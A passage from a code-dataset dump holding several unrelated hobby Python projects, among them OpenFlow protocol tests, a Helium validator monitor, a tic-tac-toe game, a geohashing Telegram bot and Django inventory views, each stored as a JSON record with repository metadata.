res)))\n","repo_name":"ramo/competitive-programming-solutions","sub_path":"python/hackerearth/LinkedList/remove_friends_simple.py","file_name":"remove_friends_simple.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"37431985761","text":"#!/usr/bin/python\n\nimport stompy\n\nfrom lts.process_manager import ProcessWorker\n\nclass GCWorker(ProcessWorker):\n def run(self):\n stomp = stompy.simple.Client()\n stomp.connect()\n stomp.subscribe(\"/queue/cancel\", ack='auto')\n while True:\n m=stomp.get()\n self.jobDone()\n\nif __name__ == '__main__':\n stomp = stompy.simple.Client()\n stomp.connect()\n stomp.subscribe(\"/queue/cancel\", ack='auto')\n while True:\n m=stomp.get()\n","repo_name":"cnshot/CNShot","sub_path":"lts/task_gc.py","file_name":"task_gc.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74423290999","text":"\"\"\"\r\nTest suite 80 checks OpenFlow protocol messages and their correct implementation. In\r\ncontrast to the basic checks, return values are checked for correctness, and configurations for\r\nfunctional implementation\r\n\"\"\"\r\n\r\nimport logging\r\n\r\nfrom oftest import config\r\nimport oftest.base_tests as base_tests\r\nimport ofp\r\n\r\nfrom oftest.testutils import *\r\n\r\n\r\n@group('standard')\r\nclass HelloWithoutBody(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_HELLO without body is accepted by the device\r\n\r\n Test case 80.10: OFPT_HELLO without body\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.hello()\r\n self.controller.message_send(request)\r\n\r\n response, _ = self.controller.poll(ofp.message.hello_failed_error_msg)\r\n self.assertTrue(response is None,\r\n \"Hello Error message was received\")\r\n\r\n\r\n@group('standard')\r\nclass HelloWithBody(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_HELLO with body is accepted by the device\r\n\r\n Test case 80.20: OFPT_HELLO with body\r\n \"\"\"\r\n\r\n def runTest(self):\r\n msg = ofp.message.echo_request()\r\n msg.xid = 213\r\n request = ofp.message.hello(elements=[msg])\r\n self.controller.message_send(request)\r\n\r\n response, _ = self.controller.poll(ofp.message.hello_failed_error_msg)\r\n self.assertTrue(response is None,\r\n \"Hello Error message was received\")\r\n\r\n\r\n@group('standard')\r\nclass ErrorMessage(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify basic error message type is implemented\r\n\r\n Test case 80.30: OFPT_ERROR\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.hello()\r\n # change hello message version to incorrect number\r\n request.version = ofp.OFP_VERSION - 1\r\n self.controller.message_send(request)\r\n\r\n response, _ = self.controller.poll(ofp.message.hello_failed_error_msg)\r\n self.assertTrue(response is not None,\r\n \"No Error message was received\")\r\n self.assertTrue(response.code == ofp.OFPHFC_INCOMPATIBLE,\r\n \"Hello Error with reason Version INCOMPATIBLE was not received\")\r\n\r\n\r\n@group('standard')\r\nclass EchoWithoutBody(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Test echo response with no data\r\n\r\n Test case 80.40: Verify Echo Reply messages are implemented\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.echo_request()\r\n response, pkt = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n \"Did not get echo reply\")\r\n self.assertEqual(response.type, ofp.OFPT_ECHO_REPLY,\r\n 'response is not echo_reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n self.assertEqual(len(response.data), 0, 'response data non-empty')\r\n\r\n\r\n@group('standard')\r\nclass EchoWithBody(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Test echo response with short string data\r\n \"\"\"\r\n\r\n def runTest(self):\r\n data = 'OpenFlow Will Rule The World'\r\n request = ofp.message.echo_request(data=data)\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n \"Did not get echo reply\")\r\n self.assertEqual(response.type, ofp.OFPT_ECHO_REPLY,\r\n 'response is not echo_reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n self.assertEqual(request.data, response.data,\r\n 'response data != request data')\r\n\r\n\r\n@group('standard')\r\nclass FeaturesRequestReply(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REQUEST / Reply dialogue\r\n\r\n Derived from Test case 80.60: Features Request-Reply\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n\r\n\r\n@group('standard')\r\nclass FeaturesReply(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REPLY contains complete feature information\r\n\r\n Derived from Test case 80.70: Features Reply\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n self.assertTrue(response.capabilities is not None,\r\n \"No features are supported\")\r\n\r\n\r\n\r\n@group('standard')\r\nclass OFPC_FLOW_STATS(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REPLY for Flow statistics support\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n self.assertNotEqual(response.capabilities & ofp.OFPC_FLOW_STATS, 0,\r\n \"OFPC_FLOW_STATS is not supported\")\r\n\r\n\r\n@group('standard')\r\nclass OFPC_TABLE_STATS(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REPLY for Table statistics support\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n self.assertNotEqual(response.capabilities & ofp.OFPC_TABLE_STATS, 0,\r\n \"OFPC_TABLE_STATS is not supported\")\r\n\r\n\r\n@group('standard')\r\nclass OFPC_PORT_STATS(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REPLY for Port statistics support\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n self.assertNotEqual(response.capabilities & ofp.OFPC_PORT_STATS, 0,\r\n \"OFPC_PORT_STATS is not supported\")\r\n\r\n\r\n@group('standard')\r\nclass OFPC_IP_REASM(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REPLY for IP packet reassembly\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n if response.capabilities & 0x20:\r\n logging.info(\"OFPC_IP_REASM is supported\")\r\n else:\r\n logging.info(\"OFPC_IP_REASM is not supported\")\r\n\r\n\r\n@group('standard')\r\nclass ConfigGet(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify that a basic Get Config Request does not generate an error.\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.get_config_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n \"No response to get config request\")\r\n self.assertTrue(response.flags is not None,\r\n \"Config reply has flags\")\r\n\r\n\r\n@group('standard')\r\nclass ConfigGetMissSendLen(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Check OFPT_GET_CONFIG_REPLY value for No special handling for fragments\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.get_config_request()\r\n response, _ = self.controller.transact(request)\r\n logging.info(response.show())\r\n self.assertTrue(response is not None,\r\n \"No response to get config request\")\r\n\r\n\r\n@group('standard')\r\nclass ConfigSetMissSendLen(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify implementation of OFPT_SET_CONFIG - miss_send_len\r\n \"\"\"\r\n\r\n def setUp(self):\r\n base_tests.SimpleProtocol.setUp(self)\r\n request = ofp.message.get_config_request()\r\n response, _ = self.controller.transact(request)\r\n self.miss_send_len = response.miss_send_len\r\n\r\n def runTest(self):\r\n request = ofp.message.set_config(miss_send_len=111)\r\n self.controller.message_send(request)\r\n\r\n request = ofp.message.get_config_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n \"No response to get config request\")\r\n self.assertEqual(response.miss_send_len, 111,\r\n \"Can't set the field miss_send_len\")\r\n\r\n def tearDown(self):\r\n request = ofp.message.set_config(miss_send_len=self.miss_send_len)\r\n self.controller.message_send(request)\r\n base_tests.SimpleProtocol.tearDown(self)\r\n\r\nclass OFPT_PACKET_OUT(base_tests.SimpleDataPlane):\r\n \"\"\"\r\n Verify Controller is able to use the OFPT_PACKET_OUT message\r\n to send a packet out of one of the DUT ports\r\n \"\"\"\r\n\r\n def runTest(self):\r\n pkt = str(simple_tcp_packet())\r\n\r\n for of_port in config[\"port_map\"].keys():\r\n msg = ofp.message.packet_out(\r\n in_port=ofp.OFPP_CONTROLLER,\r\n actions=[ofp.action.output(port=of_port)],\r\n buffer_id=ofp.OFP_NO_BUFFER,\r\n data=pkt)\r\n\r\n logging.info(\"PacketOut test, port %d\", of_port)\r\n self.controller.message_send(msg)\r\n verify_packets(self, pkt, [of_port])\r\n\r\n\r\n@group('standard')\r\nclass BarrierRequest(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify that a basic barrier request does not generate an error.\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.barrier_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n \"No response to Barrier Request\")\r\n\r\n\r\n@group('standard')\r\nclass AsyncConfigGet(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify initial async config\r\n\r\n Other tests rely on connections starting with these values.\r\n \"\"\"\r\n\r\n def runTest(self):\r\n logging.info(\"Sending get async config request\")\r\n response, _ = self.controller.transact(ofp.message.async_get_request())\r\n self.assertTrue(response != None, \"No response to get async config request\")\r\n logging.info(response.show())\r\n self.assertEquals(response.packet_in_mask_equal_master & 0x07, 0x07)\r\n self.assertEquals(response.port_status_mask_equal_master & 0x07, 0x07)\r\n self.assertEquals(response.flow_removed_mask_equal_master & 0x0f, 0x0f)\r\n","repo_name":"xuchen1992/oftest","sub_path":"tests-1.3/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":11317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44269885148","text":"import google_streetview.api\nimport google_streetview.helpers\nimport csv\nimport os \n \ndef get_request_gsv(locations, name):\n #Parameters\n param = {\n 'size': '640x640', # max 640x640 pixels\n 'location': locations, # accepts string of locations seperated by ; \n 'fov': '50', # field of view \n 'radius': '5', # radius in meters for image around the location\n 'pitch': '12', # ptich of the camera 0 = ground level\n 'source': 'outdoor', # source of the SV image 'default' = indoor and outdoor SV images\n 'key': 'YOUR_OWN_API_KEY' # API key used to get images from GSV\n }\n\n api_list = google_streetview.helpers.api_list(param)\n\n results = google_streetview.api.results(api_list)\n \n #Downloading images to a new folder with metadeta\n results.download_links('class_{}'.format(name))\n\n#Opening the .csv files with the locations\nfor file in os.listdir(\"TO/YOUR/LOCATIONS/DIR\"):\n with open(\"YOUR/LOCATION/\" + file, 'r') as f:\n next(f) # skip header line\n locs = ';'.join(f) # join the locations with ; string format\n get_request_gsv(locs, file) \n","repo_name":"meesve/AI_BachelorProject","sub_path":"DATA_REQUEST/get_request_GSV.py","file_name":"get_request_GSV.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25150688544","text":"import time, yaml, logger, schedule\nfrom helium import get_validator_status\nfrom dotenv import load_dotenv\nfrom os import path, getenv\nfrom discord import send_status_message\n\nload_dotenv()\nSTATUS_CHECK_DELAY_SECONDS = int(getenv('STATUS_CHECK_DELAY_SECONDS'))\nPERIODIC_CHECK_DELAY_MINUTES = int(getenv('PERIODIC_CHECK_DELAY_MINUTES'))\nENABLE_PERIODIC_CHECK = bool(getenv('ENABLE_PERIODIC_CHECK'))\n\nlog = logger.get_logger(__name__)\nvalidators = None\nlog.info('Validator status will be checked every {} seconds'.format(STATUS_CHECK_DELAY_SECONDS))\n\ndef get_validators():\n \"\"\"\n Load the validators from the validtors.yaml file and return them as a list.\n \"\"\"\n\n basepath = path.dirname(__file__)\n filepath = path.abspath(path.join(basepath, \"..\", \"validators.yaml\"))\n log.debug(\"Loading validators from {}\".format(filepath))\n\n with open(filepath, 'r') as f:\n data = yaml.full_load(f)\n\n for validator in data['validators']:\n validator['explorer'] = f'https://explorer.helium.com/validators/{validator[\"address\"]}'\n\n global validators\n validators = data['validators']\n\n\ndef periodic_check():\n \"\"\"\n Periodically does a status check and always sends a message\n to discord, regardless of what the status is\n \"\"\"\n \n log.debug(\"Executing periodic check\")\n check_status(is_periodic=True)\n\ndef check_status(is_periodic=False):\n \"\"\"\n Check the status of each validator and send a message to discord if it is offline.\n \"\"\"\n\n try:\n if validators is None:\n get_validators()\n\n for validator in validators:\n name = validator['name']\n explorer = validator['explorer']\n status = get_validator_status(validator['address'])\n\n if is_periodic:\n send_status_message(name, explorer, status)\n elif status != 'online':\n log.warn(\"Validator {} is offline\".format(name))\n send_status_message(name, explorer, status)\n else: \n log.info(\"Validator {} is online\".format(validator['name']))\n\n except Exception:\n log.exception(\"Error checking validator status\")\n\n# Schedule status check\nschedule.every(STATUS_CHECK_DELAY_SECONDS).seconds.do(check_status)\n\n# Schedule periodic check only if enabled\nif ENABLE_PERIODIC_CHECK:\n schedule.every(PERIODIC_CHECK_DELAY_MINUTES).minutes.do(periodic_check)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)","repo_name":"Spareo/helium-validator-monitor","sub_path":"helium-validator-monitor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40324007541","text":"from random import randint\n\n\nc = 3\nr = 3\n#x = [ [0] * c for i in range(r) ] old stuff\n#y = [ [0] * c for i in range(r) ]\ntaken = [ [0] * c for i in range(r) ]\nturn = 1\nturnCounter = 0\nglobal gameStart\ngameStart = True\nki_an = False\nnotplayer='y'\n\ndef checkwin(player):#checks if active player wins\n global gameStart\n for i in range(0,c): # Counting \"player\" in colum\n points = 0\n for ii in range(0,r):\n if taken[i][ii] == player:\n points += 1\n if points >= 3:\n updateWIN(player)\n gameStart = False\n for ii in range(0,c): # Counting \"player\" in ROW\n points = 0\n for i in range(0,r):\n if taken[i][ii] == player:\n points += 1\n if points >= 3:\n updateWIN(player)\n gameStart = False\n if taken[0][0] == player and taken[1][1] == player and taken[2][2] == player: # WIN condition top left middle bottom right\n updateWIN(player)\n gameStart = False\n if taken[0][2] == player and taken[1][1] == player and taken[2][0] == player: # WIN condition top right middle bottom left\n gameStart = False \n updateWIN(player)\n return True\ndef playermove(turn):#changes the turn order\n global notplayer\n global player\n\n if (turn==1):\n turn = turn *-1\n print(\"x's turn\")\n Set('x')\n notplayer = 'y'\n player = 'x'\n return turn\n else:\n turn = turn *-1\n print(\"y's turn\")\n Set('y')\n notplayer = 'x'\n player = 'y'\n return turn\ndef clearscreen():#\"clears\" the terminal\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\ndef Set(player):#sets the players symbol\n if ki_an == True:\n if turn == 1:\n KeyInput=input()\n if KeyInput.isdigit():\n keyCheck(KeyInput, player)\n else:\n print(\"Wrong Input\")\n Set(player)\n\n else:\n KeyInput=randint(0,9) #massive KI\n keyCheck(KeyInput, player)\n else: \n KeyInput=input()\n keyCheck(KeyInput, player)\ndef printBoard():#prints the board on call\n iii=0\n print(\"----------\")\n for i in range(0,r):\n for ii in range(0,c):\n iii+=1\n if taken[i][ii]!='x' and taken[i][ii]!='y':\n taken[i][ii]=iii\n print(taken[i][0],'|',taken[i][1],'|',taken[i][2])\n print(\"----------\")\ndef updateWIN(player):#reset screen when a player wins and prints the final set\n clearscreen()\n printBoard()\n print(player, \"wins\")\ndef keyCheck(KeyInput, player):#checking a int\n global taken\n if int(KeyInput) >=1 and int(KeyInput) <= 9:\n if taken[(int(KeyInput)-1)//3][(int(KeyInput)-1)%3] != 'x' and taken[(int(KeyInput)-1)//3][(int(KeyInput)-1)%3]!= 'y':\n taken[(int(KeyInput)-1)//3][(int(KeyInput)-1)%3]=player\n global turnCounter\n turnCounter += 1\n else:\n print(\"Wrong Input\")\n Set(player)\n else:\n print(\"Wrong Input\")\n Set(player) \ndef calcMove(player, notplayer):\n global bestmovex\n global bestmovey\n global bestmovex2\n global bestmovey2\n for i in range(0,r): # Counting \"player\" in colum\n points = 0\n for ii in range(0,c):\n if taken[i][ii] == player and taken[i][ii] != notplayer:\n points += 1\n else:\n bestmovex = i\n bestmovey = ii\n if points == 2 and taken[bestmovex][bestmovey]:\n print(\"finish row\",bestmovex,bestmovey,player)\n break\n\n for ii in range(0,r): # Counting \"player\" in ROW\n points = 0\n for i in range(0,c):\n if taken[i][ii] == player and taken[i][ii] != notplayer:\n points += 1\n else:\n bestmovex2 = ii\n bestmovey2 = i\n if points == 2 :\n print(\"finish colum\",bestmovex2,bestmovey2,player )\n break\n return True\n\nwhile gameStart:\n clearscreen()\n printBoard()\n if turnCounter >= 9: #if after 9 turns there is no winner its a draw\n gameStart = False\n print(\"Draw\")\n if gameStart == True:#if the game is running let a player make a move\n turn = playermove(turn)\n calcMove(player, notplayer)\n checkwin('x') \n checkwin('y') \n#playerturns","repo_name":"psyConteX/TicTacLearn","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9780160441","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport logging\nfrom secrets import token_urlsafe\nfrom datetime import datetime\nfrom uuid import uuid4\nfrom telegram import InlineQueryResultLocation, InlineKeyboardMarkup, \\\n InlineKeyboardButton\nfrom telegram.ext import Updater, InlineQueryHandler, CommandHandler\nfrom parse import compile\nfrom pytz import timezone\nfrom tzwhere.tzwhere import tzwhere\nfrom geohash import calculate\nimport config\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\nparser = compile('{:d} {:d}')\n\ntzw = tzwhere()\n\nwebhook_token = token_urlsafe(config.webhook_token_length)\n\ndef inlinequery(bot, update):\n loc = parser.parse(update.inline_query.query).fixed\n if len(loc) != 2:\n return\n if abs(loc[0]) >= 90:\n return\n if abs(loc[1]) >= 180:\n return\n date = datetime.now(timezone(tzw.tzNameAt(loc[0], loc[1]))).date()\n hash = calculate(loc, date)\n results = [\n InlineQueryResultLocation(\n id=uuid4(),\n latitude=hash[0],\n longitude=hash[1],\n title=str(date),\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton('Open Street Map',\n url=config.osm_url.format(hash[0], hash[1])),\n InlineKeyboardButton('Google Maps',\n url=config.maps_url.format(hash[0], hash[1])),\n InlineKeyboardButton('Geohashing Wiki',\n url=config.wiki_url.format(date, loc[0], loc[1]))]]\n )\n )\n ]\n update.inline_query.answer(results)\n\ndef main():\n updater = Updater(config.token)\n dispatcher = updater.dispatcher\n\n dispatcher.add_handler(InlineQueryHandler(inlinequery, pattern='^-?[0-9]{1,2} -?[0-9]{1,3}$'))\n\n if config.use_webhook:\n updater.start_webhook(listen=config.webhook_listen,\n port=config.webhook_port,\n url_path=webhook_token)\n updater.bot.set_webhook(config.webhook_url.format(webhook_token))\n else:\n updater.start_polling()\n updater.idle()\n\nif __name__ == '__main__':\n main()\n","repo_name":"rkr8/GeohashingBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42058185822","text":"with open(\"input.txt\") as f:\n entries = [\n int(line)\n for line in f.read().splitlines()\n ]\n\nentries.append(0)\nentries.sort()\nentries.append(entries[len(entries) - 1 ] + 3)\n\ndef part1(entries):\n diff_1 = 0\n diff_3 = 0\n \n for i in range(len(entries) - 1):\n if entries[i+1] - entries[i] == 1:\n diff_1 += 1\n elif entries[i+1] - entries[i] == 3:\n diff_3 += 1\n elif entries[i+1] - entries[i] > 3:\n break\n \n return diff_1 * diff_3\n\ndef variations(adapters):\n length = len(adapters)\n \n if length <= 2:\n return 1\n elif length == 3:\n return 2\n elif length == 4:\n return 4\n elif length == 5:\n return 7\n\ndef part2(entries):\n split_3 = list()\n current_group = list()\n\n for i in range(len(entries) - 1):\n current_group.append(entries[i])\n\n if entries[i+1] - entries[i] == 3:\n split_3.append(current_group)\n current_group = list()\n\n result = 1\n\n for l in split_3:\n result *= variations(l)\n\n return result\n\n \n\nprint(\"Day 10:\")\nprint(\"Part 1:\"),\nprint(part1(entries))\nprint(\"Part 2:\"),\nprint(part2(entries))","repo_name":"arthurbsh/advent-of-code-2020","sub_path":"10/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4080792794","text":"#Use of recursion to calculater a factorial\ndef fact(n): #defining a function and passing variable n\n if (n==0 or n==1): #condition for fact to non 0 and 1\n return 1 #if condition satisfies returning 1\n else:\n return n*fact(n-1) #else condition to be working of fact formula 3*2!\nnum = int(input(\"Enter a number:- \")) # 2*1!\nif(num<0): # return 1 then calculater all no. and giving output\n print(\"factorial doesn't exist!\") #if number is negative then factorial doesn't exist\nelse:\n print(\"Factorial of number is:- \", fact(num)) # |Calling fact function and passing value of sum to the n","repo_name":"yapranav09v/python-Tutorial","sub_path":"#3basicpython/useofRecursion.py","file_name":"useofRecursion.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"5474083606","text":"from django.http import HttpResponse\r\nfrom django.http import JsonResponse, Http404\r\nfrom django.shortcuts import render_to_response\r\nfrom django.contrib.auth import authenticate, login,logout\r\nfrom django.views.generic.base import View\r\n\r\nimport json\r\n\r\nfrom django.utils import timezone\r\nfrom questions.models import Question,Choice,Item,Location,Device,LocDev\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom django.shortcuts import render_to_response, render, redirect\r\nfrom django.template import Context, loader\r\nfrom questions.CustomContainers import User,UserFactory,StatDeviceFactory\r\nfrom django.utils.decorators import method_decorator\r\n\r\n#Function to create JSON response. \r\ndef cors_json(resp):\r\n\tprint(resp)\r\n\tr = JsonResponse(resp)\r\n\tr['Access-Control-Allow-Origin'] = '*'\r\n\tr['Access-Control-Allow-Methods'] = \"GET\"\r\n\tr['Access-Control-Allow-Headers'] = 'X-Requested-With,content-type'\r\n\treturn r\r\n\r\n@csrf_exempt\r\ndef index(request):\r\n\tlocation_good = 0\r\n\tlocation_bad = 0\r\n\titem_good = 0\r\n\titem_bad = 0\r\n\tfor q in Question.objects.filter(item_assoc=None):\r\n\t\tif q:\r\n\t\t\tlocation_good +=1\r\n\t\telse:\r\n\t\t\tlocation_bad +=1\r\n\tfor q in Question.objects.filter(location_assoc=None):\r\n\t\tif q:\r\n\t\t\titem_good +=1\r\n\t\telse:\r\n\t\t\titem_bad +=1\r\n\tstuff = {\r\n\t\"location_good\":location_good,\r\n\t\"location_bad\":location_bad,\r\n\t\"item_good\":item_good,\r\n\t\"item_bad\":item_bad,\r\n\t}\r\n\treturn render(request,'questions/index.html',stuff)\r\n\r\ndef logout_view(request):\r\n logout(request)\r\n # Redirect to a success page.\r\n\r\ndef devices(request):\r\n\tdev = list(Device.objects.all())\r\n\tdev.sort()\r\n\titems = {\"devices\":dev}\r\n\treturn render(request,'questions/devices.html',items)\r\n\r\ndef locations(request):\r\n loc = Location.objects.all()\r\n items = {\"Location\":loc,}\r\n return render(request,'questions/location.html',items)\r\n\r\ndef users(request):\r\n\treturn render(request,'questions/users.html',{'usrs':UserFactory()})\r\n\r\ndef locationsadd(request):\r\n\tdev = Device.objects.all()\r\n\titems = {\"devices\":dev}\r\n\treturn render(request, 'questions/location_form.html', items)\r\n\r\ndef deviceadd(request):\r\n\treturn render(request, 'questions/device_add.html', {})\r\n\r\ndef recent_scaned(ques,n):\r\n\tout =[ int(q.time_scanned) for q in ques]\r\n\tout.sort()\r\n\treturn out[-n:]\r\n\r\nclass deviceView(View):\r\n\t@method_decorator(csrf_exempt)\r\n\tdef dispatch(self, request, dev_pk):\r\n\t\treturn super(deviceView, self).dispatch(request, dev_pk)\r\n\tdef get(self, request,dev_pk):\r\n\t\tdev = Device.objects.get(id=dev_pk)\r\n\t\titms = Item.objects.filter(item_type=dev)\r\n\t\tthings = {'device': dev,'items':itms, 'dev_pk':dev_pk}\r\n\t\treturn render(request, 'questions/device-view.html', things)\r\n\tdef post(self, request,dev_pk):\r\n\t\treceived_json_data=json.loads(request.body)\r\n\t\tItem.objects.create(item_type=Device.objects.get(id=dev_pk),\r\n\t\t\t\t\t\t\titem_barcode_num=received_json_data[\"barcode\"])\r\n\t\treturn HttpResponse(\"Correct\")\r\n\r\nclass ChangeUser(View):\r\n\t@method_decorator(csrf_exempt)\r\n\tdef dispatch(self, request, loc_pk):\r\n\t\treturn super(ChangeUser, self).dispatch(request, loc_pk)\r\n\tdef get(self, request,loc_pk):\r\n\t\treturn Http404(\"Not for human eyes\")\r\n\tdef post(self, request,loc_pk):\r\n\t\treceived_json_data=json.loads(request.body)\r\n\t\tLocation.objects.filter(pk=loc_pk).update(user_assigned=received_json_data['newuser'])\r\n\t\treturn HttpResponse(\"Correct\")\r\n\r\ndef locationView(request,loc_pk):\r\n\t#<!--{% #url 'questions:deviceView' loc.0.id %}-->\r\n\tlocation = Location.objects.get(id=loc_pk)\r\n\tdev = StatDeviceFactory(loc_pk)\r\n\tthings = {\r\n\t'location': location,\r\n\t'device' : dev,\r\n\t}\r\n\treturn render(request, 'questions/location-view.html', things)\r\n\r\n#Delete class is used to delete things from database. \r\n@csrf_exempt\r\ndef delete(request):\r\n\tif request.method == 'POST':\r\n\t\treceived_json_data=json.loads(request.body)\r\n\t\tif \"device\" in received_json_data and \"barcode\" in received_json_data:\r\n\t\t\tinstance=Device.objects.get(id=int(received_json_data[\"device\"]))\r\n\t\t\tinstance_barcode=instance.item_set.get(item_barcode_num=int(received_json_data[\"barcode\"]))\r\n\t\t\tinstance_barcode.delete()\r\n\t\tif \"device\" in received_json_data and \"barcode\" not in received_json_data:\r\n\t\t\tinstance=Device.objects.get(id=int(received_json_data[\"device\"]))\r\n\t\t\tinstance.delete()\r\n\t\tif \"location\" in received_json_data:\r\n\t\t\tinstance=Location.objects.get(id=int(received_json_data[\"location\"]))\r\n\t\t\tinstance.delete()\r\n\t\treturn HttpResponse(\"Success, deleted. \")\r\n#To add a device run this function. Activated with API call. \r\n@csrf_exempt\r\ndef adddevice(request):\r\n\tif request.method == 'POST':\r\n\t\treceived_json_data=json.loads(request.body)\r\n\t\tdevice_name=received_json_data[\"device_name\"]\r\n\t\tmanu=received_json_data[\"manu\"]\r\n\t\ttype_equip=received_json_data[\"type\"]\r\n\t\tmodel_number=received_json_data[\"model_number\"]\r\n\t\tquestions_for_the_device=received_json_data[\"questions\"]\r\n\t\tbarcodes=received_json_data[\"barcodes\"]\r\n\r\n\t\tnew_device=Device.objects.create(device_name=device_name, manufacturer=manu, type_equip=type_equip, model_number=model_number)\r\n\t\tfor barcode in barcodes:\r\n\t\t\tnew_device.item_set.create(item_barcode_num=barcode)\r\n\t\tfor question in questions_for_the_device:\r\n\t\t\tnew_device.question_set.create(question_text=question)\r\n\t\tnew_device.save()\r\n\t\treturn HttpResponse(\"Sucess, id added is:\" + str(new_device.id))\r\n#Class used by web application to add a location\r\n@csrf_exempt\r\ndef addlocation(request):\r\n\tif request.method == 'POST':\r\n\t\treceived_json_data=json.loads(request.body)\r\n\t\tloc_barcode=received_json_data[\"loc_barcode_num\"]\r\n\t\tloc_name=received_json_data[\"loc_name\"]\r\n\t\tuser_assigned=received_json_data[\"user_assigned\"]\r\n\t\tquestions_for_loc_only=received_json_data[\"loc_questions\"]\r\n\t\tdevices_to_add=received_json_data[\"devices_to_add\"]\r\n\t\tlocation=Location.objects.create(loc_barcode_num=loc_barcode, loc_name=loc_name, user_assigned=user_assigned)\r\n\t\tfor locquest in questions_for_loc_only:\r\n\t\t\tlocation.question_set.create(question_text=locquest)\r\n\t\tfor device_id in devices_to_add:\r\n\t\t\tfound_device=Device.objects.get(id=int(device_id))\r\n\t\t\tLocDev.objects.create(location=location, device=found_device) #Check me\r\n\r\n\t\treturn HttpResponse(\"Correct\")\r\n\r\n#Questions by user view. \r\n@csrf_exempt\r\ndef questionsbyuser(request):\r\n\tif request.method == 